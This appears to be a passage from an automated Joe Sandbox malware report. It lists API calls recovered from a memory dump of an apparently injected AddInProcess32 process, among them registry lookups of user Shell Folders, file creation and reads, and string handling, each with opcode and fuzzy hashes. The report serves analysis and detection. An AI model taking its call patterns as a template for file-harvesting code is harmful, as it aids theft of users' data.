                                                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                      • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                      APIs
                                                      • memset.MSVCRT ref: 004095FC
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                        • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                      • String ID:
                                                      • API String ID: 3655998216-0
                                                      • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                      • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                      • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                                      • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                      • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                                      APIs
                                                      • memset.MSVCRT ref: 00445426
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                      • String ID:
                                                      • API String ID: 1828521557-0
                                                      • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                      • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                      APIs
                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ??2@FilePointermemcpy
                                                      • String ID:
                                                      • API String ID: 609303285-0
                                                      • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                      • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp
                                                      • String ID:
                                                      • API String ID: 2081463915-0
                                                      • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                      • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                      APIs
                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                      • String ID:
                                                      • API String ID: 2136311172-0
                                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                      APIs
                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ??2@??3@
                                                      • String ID:
                                                      • API String ID: 1936579350-0
                                                      • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                      • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: free
                                                      • String ID:
                                                      • API String ID: 1294909896-0
                                                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: free
                                                      • String ID:
                                                      • API String ID: 1294909896-0
                                                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: free
                                                      • String ID:
                                                      • API String ID: 1294909896-0
                                                      • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                      • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                      • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                      • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                      APIs
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                      • wcscpy.MSVCRT ref: 0040A107
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                      • String ID:
                                                      • API String ID: 1331804452-0
                                                      • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                      • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A